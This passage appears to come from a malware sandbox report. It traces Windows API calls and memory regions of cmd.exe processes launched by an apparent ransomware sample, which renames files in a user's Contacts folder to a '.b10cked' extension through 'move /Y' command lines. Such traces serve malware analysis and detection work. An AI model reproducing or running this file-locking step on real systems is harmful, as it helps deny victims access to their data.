lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x71bd8) returned 0x60e68 [0219.557] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact.b10cked", nBufferLength=0x104, lpBuffer=0x2ced0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact.b10cked", lpFilePart=0x0) returned 0x38 [0219.557] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact", 
nBufferLength=0x104, lpBuffer=0x2ced0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact", lpFilePart=0x0) returned 0x30 [0219.557] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ofhbnh edferrr.contact")) returned 0x20 [0219.557] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact" (normalized: "c:\\users\\eebsym5\\contacts\\ofhbnh edferrr.contact"), lpNewFileName="C:\\Users\\EEBsYm5\\Contacts\\ofhbnh edferrr.contact.b10cked" (normalized: "c:\\users\\eebsym5\\contacts\\ofhbnh edferrr.contact.b10cked"), dwFlags=0x3) returned 1 [0219.558] FindClose (in: hFindFile=0x60e68 | out: hFindFile=0x60e68) returned 1 [0219.558] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2cecc0 | out: _Buffer=" 1") returned 9 [0219.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.558] GetFileType (hFile=0x7) returned 0x2 [0219.634] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.634] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cec4c | out: lpMode=0x2cec4c) returned 1 [0219.634] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.634] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cec80 | out: lpConsoleScreenBufferInfo=0x2cec80) returned 1 [0219.634] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0219.635] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x2cecc0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0219.635] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2ceca4, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x2ceca4*=0x1a) 
returned 1 [0219.635] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.635] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0219.635] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.635] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0219.635] _get_osfhandle (_FileHandle=0) returned 0x3 [0219.635] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0219.635] SetConsoleInputExeNameW () returned 0x1 [0219.635] GetConsoleOutputCP () returned 0x1b5 [0219.635] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0219.636] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.636] exit (_Code=0) Process: id = "567" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169e0" os_pid = "0x78c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32752 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32753 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 32754 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 32755 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 32756 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32757 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32758 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32759 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32760 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32761 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32782 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32783 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32784 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32785 start_va = 0x230000 end_va = 0x23ffff entry_point = 0x0 
region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 32786 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 32787 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32788 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32789 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32790 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32791 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32792 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32793 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32794 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" 
(normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32795 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32796 start_va = 0x240000 end_va = 0x307fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 32797 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32798 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32799 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 32800 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 32801 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 32802 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 32803 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 32804 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 32805 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 770 os_tid = 0xe9c [0219.353] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fb0c | 
out: lpSystemTimeAsFileTime=0x12fb0c*(dwLowDateTime=0xb78ba520, dwHighDateTime=0x1d440a9)) [0219.353] GetCurrentProcessId () returned 0x78c [0219.353] GetCurrentThreadId () returned 0xe9c [0219.353] GetTickCount () returned 0x3d420 [0219.353] QueryPerformanceCounter (in: lpPerformanceCount=0x12fb04 | out: lpPerformanceCount=0x12fb04*=27614187606) returned 1 [0219.353] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0219.353] __set_app_type (_Type=0x1) [0219.353] __p__fmode () returned 0x76b331f4 [0219.353] __p__commode () returned 0x76b331fc [0219.353] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0219.353] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0219.354] GetCurrentThreadId () returned 0xe9c [0219.354] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe9c) returned 0x38 [0219.354] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0219.354] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0219.354] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.354] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0219.354] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fa9c | out: phkResult=0x12fa9c*=0x0) returned 0x2 [0219.354] VirtualQuery (in: lpAddress=0x12fad3, lpBuffer=0x12fa6c, dwLength=0x1c | out: lpBuffer=0x12fa6c*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0219.354] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fa6c, dwLength=0x1c | out: lpBuffer=0x12fa6c*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, 
RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0219.354] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fa6c, dwLength=0x1c | out: lpBuffer=0x12fa6c*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0219.354] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fa6c, dwLength=0x1c | out: lpBuffer=0x12fa6c*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0219.354] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fa6c, dwLength=0x1c | out: lpBuffer=0x12fa6c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0219.354] GetConsoleOutputCP () returned 0x1b5 [0219.354] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0219.354] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0219.354] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.354] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0219.355] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.355] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0219.355] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.355] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0219.355] _get_osfhandle (_FileHandle=0) returned 0x3 [0219.355] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0219.355] _get_osfhandle (_FileHandle=0) returned 0x3 [0219.355] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0219.355] GetEnvironmentStringsW () returned 0x340178* [0219.355] FreeEnvironmentStringsW (penv=0x340178) returned 1 [0219.355] GetEnvironmentStringsW () returned 0x340178* [0219.355] FreeEnvironmentStringsW (penv=0x340178) returned 1 
[0219.356] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ea0c | out: phkResult=0x12ea0c*=0x40) returned 0x0 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x0, lpData=0x12ea18*=0xa0, lpcbData=0x12ea10*=0x1000) returned 0x2 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x1, lpcbData=0x12ea10*=0x4) returned 0x0 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x0, lpData=0x12ea18*=0x1, lpcbData=0x12ea10*=0x1000) returned 0x2 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x0, lpcbData=0x12ea10*=0x4) returned 0x0 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x40, lpcbData=0x12ea10*=0x4) returned 0x0 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x40, lpcbData=0x12ea10*=0x4) returned 0x0 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x0, lpData=0x12ea18*=0x40, lpcbData=0x12ea10*=0x1000) returned 0x2 [0219.356] RegCloseKey (hKey=0x40) returned 0x0 [0219.356] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ea0c | out: phkResult=0x12ea0c*=0x40) returned 0x0 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x0, lpData=0x12ea18*=0x40, lpcbData=0x12ea10*=0x1000) returned 0x2 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x1, lpcbData=0x12ea10*=0x4) returned 0x0 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x0, lpData=0x12ea18*=0x1, lpcbData=0x12ea10*=0x1000) returned 0x2 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x0, lpcbData=0x12ea10*=0x4) returned 0x0 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x9, lpcbData=0x12ea10*=0x4) returned 0x0 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x9, lpcbData=0x12ea10*=0x4) returned 0x0 [0219.356] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x0, lpData=0x12ea18*=0x9, lpcbData=0x12ea10*=0x1000) returned 0x2 [0219.356] RegCloseKey (hKey=0x40) returned 0x0 [0219.356] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b5 [0219.356] srand (_Seed=0x5b8863b5) [0219.356] 
GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact.b10cked\"" [0219.356] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\LODKDA~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\lodkd auftnm.contact.b10cked\"" [0219.356] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0219.357] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3418d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0219.357] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0219.357] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0219.357] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0219.357] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0219.357] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0219.357] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0219.357] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0219.357] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0219.357] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0219.357] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0219.357] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0219.357] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0219.357] GetEnvironmentStringsW () returned 0x3422c8* [0219.357] 
FreeEnvironmentStringsW (penv=0x3422c8) returned 1 [0219.357] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.357] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0219.357] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0219.357] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0219.357] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0219.357] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0219.357] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0219.357] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0219.357] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0219.357] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0219.358] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f7d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0219.358] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f7d8, lpFilePart=0x12f7d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f7d4*="Desktop") returned 0x18 [0219.358] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0219.358] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f554 | out: lpFindFileData=0x12f554) returned 0x340008 [0219.358] FindClose (in: hFindFile=0x340008 | out: hFindFile=0x340008) returned 1 [0219.358] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f554 | out: lpFindFileData=0x12f554) returned 0x340008 [0219.358] FindClose (in: hFindFile=0x340008 | out: hFindFile=0x340008) returned 1 [0219.358] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f554 | out: lpFindFileData=0x12f554) returned 0x340008 [0219.358] FindClose (in: 
hFindFile=0x340008 | out: hFindFile=0x340008) returned 1 [0219.358] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0219.358] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0219.358] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0219.358] GetEnvironmentStringsW () returned 0x342ae8* [0219.359] FreeEnvironmentStringsW (penv=0x342ae8) returned 1 [0219.359] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0219.359] GetConsoleOutputCP () returned 0x1b5 [0219.359] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0219.359] GetUserDefaultLCID () returned 0x409 [0219.359] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0219.359] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f918, cchData=128 | out: lpLCData="0") returned 2 [0219.360] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f918, cchData=128 | out: lpLCData="0") returned 2 [0219.360] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f918, cchData=128 | out: lpLCData="1") returned 2 [0219.360] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0219.360] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0219.360] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0219.360] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0219.360] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0219.360] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0219.360] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0219.360] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0219.360] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0219.360] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0219.360] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0219.361] GetConsoleTitleW (in: lpConsoleTitle=0x3308d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.361] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0219.361] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0219.361] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0219.361] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0219.362] _wcsicmp (_String1="move", _String2=")") returned 68 [0219.362] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0219.362] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0219.362] _wcsicmp (_String1="IF", _String2="move") returned -4 [0219.362] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0219.362] _wcsicmp (_String1="REM", _String2="move") returned 5 [0219.362] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0219.365] GetConsoleTitleW (in: lpConsoleTitle=0x12f610, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.365] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0219.365] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0219.365] _wcsicmp (_String1="move", 